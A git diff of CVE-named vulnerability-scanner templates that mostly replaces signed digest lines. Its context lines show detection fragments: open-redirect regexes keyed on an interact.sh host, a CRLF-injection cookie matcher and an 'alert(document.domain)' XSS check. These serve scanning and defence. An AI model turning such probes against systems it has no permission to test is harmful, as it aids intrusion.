490a0046304402205df7e17e2bd096c057da9ca62e2b8f2d2e470fcd2a8f2762a86a8cb4af4d59650220714ffe8360a7dacfefbf22590466ff6143cfe6bdd343fc6bef832b0f17e5d80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 221f352968..47dd0cbbb9 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d133287634b0de402f56793317b9ce462e06adfc05d6b26527e1086e895a7308022100ec33fa1be1621f0f49d74ca15c95f71d644041a26c2d37b4ed4dfa2d977244de:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022014beabbc0467529765c9b1bc167a38f925bb8122dac10fac071536b284f5d2be022100feac2c51c5cce9f994fb56d80013e18c315943756635582dc7bcdd6902ecc236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 00b26fdc7c..a1e1245dd4 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210081bb41c0c871c7eec6ade32e99cacca798355dc20461f1775b2973d4f177fbc302210089bc42a175d409acbb96189b97790d8b74c3e9f5527678b3f795d3d8c6838603:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008f32a37ed1a564fd7b21dcfa6e1bde9e2dec6bb2dfe25862bef5c230549aeab60220497c3f7ae3460501e41262aadd7aac35dc92d81149a847f241c8bfad89fc6056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 49e9e8eb6b..5de5f1f323 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200f0f68a8f97cfe9aa98286dfabb74c0a38f660e60e5f6d6d490d7120596b0bcf022064377ded76c15c02b87d125f63dc95a3dbe3d9417db857937e2c113021e01b73:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008d4cffeb64951396678cd7267a48e3667a782bc7e315845189bdcfffb1fa4241022024708de8e0444a606921b1c3acd821f4139a1c750db35f1ebd3978c36ca64cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index eea8807831..5b1978dded 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100eadb72da837209df394fd90ab0fb02f8531921116bcedb77211b21d522c6c49c0221009077f0d7dc99e31a9eb9d19805f6fdec470c1ea0cac2b50ddba8baca43cabdf9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022062dba5981411aaa5a3558e21e1b8ad17fc14dea00577450360de7581cb82ef150221009690910f80c5fb94fcbc2a498b07036a4832533474219706fe70486f12d07dd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 3095fc8198..5bea3fe296 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022071941e753294331dfa54b59a674ce824b146fc5e1e7c644fdcc34ed0b192cb4c0220604059a4c04afc6e2508a9a2ab5b9c65845c798eb996781f9e79f99907c18d41:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200a6fdfbbcd4fc342580c0b5d20cb835f1f5b13dde10c7aea1da03e4a102d4b96022100c8694072b5c5a3e84567ac7a8fa7f081eb4b63f06e001256c431dcc99b34aa57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index fc96b758b9..67ff296055 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a00463044022052f2ff6778cd14a0dac85cde42ec06d9d41fcc2f3f5a33927952ecf2e4b953bd02205d72c190194d4970de9b02a3c7c6d4f4235088a7bf5f11c459ce9b2d46eb9878:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210090c142aeeccebf0e5f1f9aa9c2340f60706861572f058a977db7f01f54ce4cb602200ee2b96b7806f58f90f1cad98e6dcf0259249f6c0c53a1a6a01ab21afc379303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 5438344c87..925dff1bf1 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a00473045022100ac428ddf1d0361d027e7d3c5f7986142a25b255257929bbe151c7addc784191902207f1b575827253a42bbe52255c35f60fcad45b35fc0d5b815eda5e275184840f8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a66d6b2fc208c15620ce1184c348e594a6929e2aaa32be2cb8e9d9626423d39a022100ab4dc590ce9dd40afc64e67cbddc6291c4d4dd9e83e57f59de0065a1de77a263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 15637c204c..b3ab130fb3 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a4d903cca4f9f615bcf696b15cbafa615743d4fa1f2ce74320278a305fdb2e6802200fa2311af283c9fbf42623995bfc5063ac2b69b8193334cf4c5af379c13c5cc8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f12027b64b07d3eb01edbde1cee4a2d70a259b75c0e85cf6dc8952bf652531602204dfb493363e9101f4c3af364589b82e9b94980c2826b71903283631d18d18eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 1c424baee9..5044682b4b 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203f2b6605243e82bde2276688638bacfca42e399e4849a47e322f5e3a619a473c022100968fa583e8dbb6a9ccafb1978c715d81e23eecd19e0c5d58c4ba8124b5f807b2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207062bdb633d9fe135871d101c64a9dc58c0719f1872fb5857fea654880b6cf44022100935e9d5485fb9a2842686ab65491dd0f3ed2792ec94cfbe5de4daca8308a57c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 6296ff460e..e9148fd5e5 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 400 - -# digest: 4b0a00483046022100fc8698bd2620ac769885e882aa3a5a4e75a8428ea1c51bb8cdc5fa9842e15dca022100a8847166448900f5d16bd1b357d994e0b762d2c7f0fb81aa8ddfdd71e07bab41:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ef6608aaac394b2844a9a4df6bd2eb09146a5535b080472f6ec0413a98899861022100d872fa46cb8b4806ba652b2b5f00cb0ff13b785398979c8e195b6e499b323c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 7dcd85c149..c39b9822d8 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022023ae1fe272df5372c6c6127fb283bfe8742939b51d3107e7c261c8e77f57e180022100c9e99bcc7fffa8aceba69592057c0335822778352339ffea1fd689ef89f1d939:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e59d6b38595a929862dc4b2287fdbc3b9846765b3be7e26ef1dc90eafcd1a8e50221008d456d5840bb709673040739355e31ab659a931fd24f25ca2baf36cb6b420944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index d0d1b101b6..41b9c42d3c 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -45,5 +45,4 @@ http: part: body words: - "" - -# digest: 4b0a0048304602210096dd8e58aff1302f68dc44cf8d260d192ce44645e99c6e6d97fccf7920eaf42a022100ab090f8e22d6232a9cc250ca0584e7e97e7f7a36a3e6e8728d12b9a51a9c461e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d0ee71c8c0be2b60c85e5786848b9deea7bd32adbf5024e25e2103741f9c49d102205def2782042097c971549c9d2cc3bd8bcad5234a836e3f84ad98261788f39e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index a5ea717c9e..050f41e549 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c0278b0048afaffe559eea258744251130253e6680ffda433458fb6f199c6a410221009e93a9b460cd401252d5f542304fa97824b83ec7041ea606972b9ed06c963e87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022065f1baee95bda523bb8b77e8acbcf517b4d37e9ee5de57924974ed442a3e6b3c022100bbff4bc17907c8f6aa7ddd4b7da1ea3aed1419278dd865b1a8538bbed2cc69a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 9a8d8a94a9..83e8cc0ac4 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022066d4e481da5f436542820d4f6b88ace1fb3b8481467694db76141e5a6bd4900a022011c776a8d36882a6f15c5a8048aff7a2715ca9bed3790be913339be218fbd688:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100eff63909502d26dffde242cc53511f7754d65446eb68ea5278ec426d38f70c32022075cb714f4bd97d75f563c259c4274427bdcc0c5f26762d432dfb538be3fb2198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 395fa2e881..1ab9e9ee8b 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022079c6577e09ec4fa4327432fff92696b39d6f2939051f60cc84d17b16cdb930bd0220360f05da542655c9c43113a501e41538302bd22d77d95e424c2e7cf3f9ff44fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022010995db5feadc4e3d4aa368e43b87c7657b8c51c15452fab30518806d6b5d80402205dab3af02f9a177b2f23f6d83bab1aeff14d906ec8ff7ef9409c4bc1dd5cb4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 21cef10f67..9cb1dcae76 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205295d545f00dab70a62571afe614c9fe68a5e5b939e6ba9edbfc33515c78b49a022074d9d9aba2a1022aa1f9c9964f7a527da2e916b26908c578e7cea4c87866f3a7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210085f8ae7b1ee47b159938ba01149f03b24b025e22e31e16902d8f733e8955a29a02207112cb988c0464365b611fb7794885c4c7099af3b172491085720512afa1baf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index b57f480606..823b53281f 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a00463044022073b36097bb2afe6cef3c65a36542300478481af5927f00642029c7aaa4501eb4022043838c890f049f8f61dae0508735306e488c5d5daf09faf1bc30fd8a90b8d7ca:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202df6c970705e246a0ac3c70772adcef5fd39b03d332e053b5b1c77d4d9107578022100f852cb865a3c507739f6e61eb07ca73eca67d143a568f00ef82123fa025f1d82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 15470b568a..8caf4c4072 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022026b43dc3e3a1bcb5e824bd69d5dfbb2300fff27e36bde14e86a3add74926331a02202bde7fea1d47f7fa4207b0534292172e6f50dacb91773bfc37154d4b537d89b2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ff184b0a06c340249f16fbfe4e95e429fbc634ab0900c05669e91f2a668a1db0022100eb2088a6b224426b4c44d5f2eefcdc541a35d0b8838fbf56c22d6b8aeac06c5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index e093a3ecee..61ff2460b2 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202e9653e2b4961c1e938d28570d14981d1c46a24657e19e12d73c239573d2a45a022027a85167359445c3455967dbf1755cd4a6c6dc4920669666be7d3b18871578d2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022013feb8bd7b2209a0306e6e69c34a8354529e2fa523d6483fee2cf984dc371c76022100c1fcb685c0df60544793826dd6109126e3d69c92eefe034ca216250054ddf5c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index b9bc350ba3..3e0de3ac1d 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -37,5 +37,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 490a0046304402203b422e675cce7cc4cb6ab48bf3a394e201e044ea04e59aafecf89c4c4d695a0402207d6317fe01a8d17e5c79559ee0e3deaf33164d8275cffb86dd51ae82435c7869:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220088d978fabdf7c4460055bc040b9f2d1aa3f324dd0e2cbd7bb51170dd18f956f022019a68e43e80ac730c71d5b798b5623389852dff7cc1ad17e8ffd6be44942d0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 83dfb25a50..12db69a0e7 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and - -# digest: 4a0a00473045022100900160d19a4d226bd61f506f2a4dbbd37de391242379fc7ceff83b21721a912002200fd5fdb59e882cb9c491cfeefcf947c7adc7188cb16472678e6e9de5b2d3dd7c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dc09481b87dcf1e234bc95404b55e7ece9286a9447e0e45b03802b42ae7b1026022100aad2493d6b0ac32860daa9e6e17b30b6062ded327ee2ffe297fc253a2955c265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 57584a53b2..4bb6c50c6a 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -45,5 +45,4 @@ http: status: - 200 - 500 - -# digest: 4a0a00473045022100d884aa58b1b20613d6846064ec746fa079da341173544e4ed745bf87c1879c710220624955783789d0c3e39fa7f0708fb0dae1c7773e48d6f08b0ebe1d26e4f4cd81:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d93c43fb5137caa9f0401c1953f2ed7ca03c42f453292a8d3f109924d5b96920022100a576d1b1ab4f963fd80fbe47fa690939d0110a89f0ddcf8294e9dc5c04303588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index d2ebfcdb60..cec68f900c 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203d3ccf5761bba9caaaac617461fecf59b8062aead63dbf03f3422c038d8ae36402205912eae31d21985ccc41db030e21a89ead702f32fc346f9c7d5b102442c2e0af:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ed31953a2c35d4f3c38bdb97f2025970fdb7b1c2ebb31814349fdc0dbfceec28022026d3c02cbb8170a2b61f6cc56970893f6f494c73b6632fd50eb69fac71c1d099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 40f0586897..09ee786130 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and - -# digest: 490a0046304402205dccb37f21b06c1219646ede4d69b34ca036f486305602123110e3390d8c384302207e492b038686e5714ccd052799650da456301dec93f1190d7e1808a31a25d485:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022015fd5275c098a0b480b8f2f31f8f4ede60885f1f2c8e5833adc1badd47b49810022005cabe10f7102eb6d21dd23970586efeada05ba03657395f89f6a9e8b4516d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 11d0d2da84..b8f11b600c 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100eeaafa830c856a3f1b17ac0406d7eb3e83d484a73eb2686e6a9708bac616d93f02210086e666b24201fcae8e011e58318518901d4a87f71d3120bdb97546b4564b7612:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bec6a138ee569d814aec9a08c73ec3c7df091d22e00f89a229eb0575becaad66022030505cda504aaa90148e7b0584135bab56a6f963ed4b49f015322125634ebf07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 9cde002861..60dc9e83f4 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220181d3ec790f65ea7d96e51aa819a615abcda731d8134763e62e94ab10b310123022100ea38d841a01b030afa6335ea9a987342bf31991d7dfd5a0cdace99dd5fa74180:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c1db3f43452b036b350399b59ec85606f03611fbb67128eeb42e668e1c0a0f8402203af2520065c3d9c41c19b9b6b17e5cee406ff8d0a91514aa597fe3cf6982d6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index d9776c2440..1d9ec89833 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -48,5 +48,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and - -# digest: 4a0a0047304502206aea9a6312f7350b9af23efa2ba3b11d355c4ff96476a8e954f17c23a8b61cb6022100ad2528b163147897d5863d13c74b6bc7c213a9ffe8823cef8410750b041583a7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e8a70c528391ec518562d14abf00bac04fa1baf650c3a17edfd1ec30548e194b022100eb679ad63d05c96d87a670915e9684778a057aa24579905d64c546e8a479334e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index b8a2531903..36ca142c50 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022100a43e8ad211e76102490f649223d49bd7a0553f1c4040a3a9929f9de4f48272ee02202d4bb2eaea0e415bb7cddb8b17b147950a409dfa133a002e622fe444212a8f4c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ab9985148851f0fe604ac7f92df06e96a8e0535013ed5db76f46e6103e993b97022100c2c70205e1cf8c9f1f0bf0abebdbffc12926b7a472eef4778a39d029b6db2cb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 79fd4c6b35..7551ba8f49 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - -# digest: 4a0a004730450221008b4387eeabe359041a2b70d64e4f5c4b37fb97bf9c361972adca630dd9deb54502203c07ef84741819ad5a1e2040d6962aabb6832c42d84a72616273bfb1a8f0d070:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008736dd60da435947c86ae74b8dbd72b00f7ef81be5d6ded8a79d1da0184e2a05022045a77a3ce9fda34b0e62957b40ee61acd3eed048334fb9f5171b61c9944d1045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 5264ce916f..a36ac8f1b2 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 400 - -# digest: 4b0a00483046022100c83a9ff72e8ecd93535ea357cd209b316306ce4223c52ac5d7910a74ae508de8022100c7535cdb22cfaf810af0cfb09f0b94756aa0c06c5e70720a90ceb91813640079:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022053de3515f0701d489ee72c3a4a1d930d27fc6e2a07760e8e543b27359751238902203d0728ad3417af362497066bec08537504cd8a192bab67d2d2b6d7c6025acd80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index f9f7f9790c..6905b2f4d0 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -50,5 +50,4 @@ http: regex: - 'Success "([a-z]+)"' part: body - -# digest: 4a0a004730450220054665c1517ddd8c6410ec44797773a6ed535ecdbf2f56921eac4e25a5e73d120221008640b2db610760ea9a838b8466b41699ff16dc572af82e06f56c7f080b277cb7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008aba9082d6360fb30c37ccb3887be0aafb8029d244e79598aada60cada6ebc440221008040532d4d67857b8865a2842987c7697852a3bf7c12d9255cfe472b5604874f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index bba1e981ad..d19772f200 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -54,5 +54,4 @@ http: - 200 - 503 condition: or - -# digest: 4b0a00483046022100f8098776dafb488953c6f3023b5f44910fe6bae3d18d25435c1ce8b067160599022100bc02c7103bd1e1e9fb04ed2b25f89577602ecac30d85c2d999d773db2aa26d11:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f08dde14fc61dc2145ac72f067e7f9b2d984958e08e6aa538027074005f2c7de022100db75567ca87da2073f3aa45b60fb8eb4c01d414b8b3e5deaa035f93c82f206c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index f8cc0c128e..c1d119dc6b 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203722061edbea61dd4f16aef82921315ece50daeaf2727788a75f2d884d96305b02210087c064b638ba8a6dfd4377e5822a92bd976931ea16325e0f5e922b91643db396:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100abe22c4c872656c9025c7823ac6ed79ee95835bb79a029c355fc21d600e54302022100db14ecfa1b7784f9a2512bee83ccf3c26832682278e5bf594c2ee2f216c73a90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 20efe93120..a9d1fcf6c6 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201add2de236807280228f54dd4758d61caef78c96186e7c3975f344b3881e9fba022058f689f864496f13b70f11b2a5d390a36f1ba2f8fc060d0d43c345eac38a2cd0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d46b2c27d72ecae8ea4f7587ca55b49b689475c5bb848a6cccde574ff6e31b5b022100bf3cf9355987b6285d8f4c7a004ab994f693845bdf978a805b5014f71b1e2015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 58f366ae42..6526831bee 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 500 - -# digest: 4a0a00473045022033c07782b19fc05ef52e53223219547de433778503b292b50e49c57d2320f615022100bb10f63aab13ac54e2fe308348755d08e8d27f25db9293c0e790da584ef2ce51:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022000a2387a31a5d14eebb35ec56cb4b18289a2a7e28ae4892d280bbc61488b5338022035864005a09e4a976b64800e38688ba24e4916bed0432c2fa853b775772fcd15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index a074849e95..d89387903a 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210092ca2c021d27c2a63652e130a5e6a439180197980af256a8711693420e6c25a402210090b691c58fe23daba6918059618de57d8c34a2fde5b39abdd630e1771b3fb95e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cec00eb8922528b152fa32c3e2f7aa9b1d5cfe951561afa1d8a2385bdd71011b0220018000d6799e741d6457718c2e6f5c29389b91eede3b5953a25c13961264e7d6:922c64590222798bb761d5b6d8e72950 \ No newline at 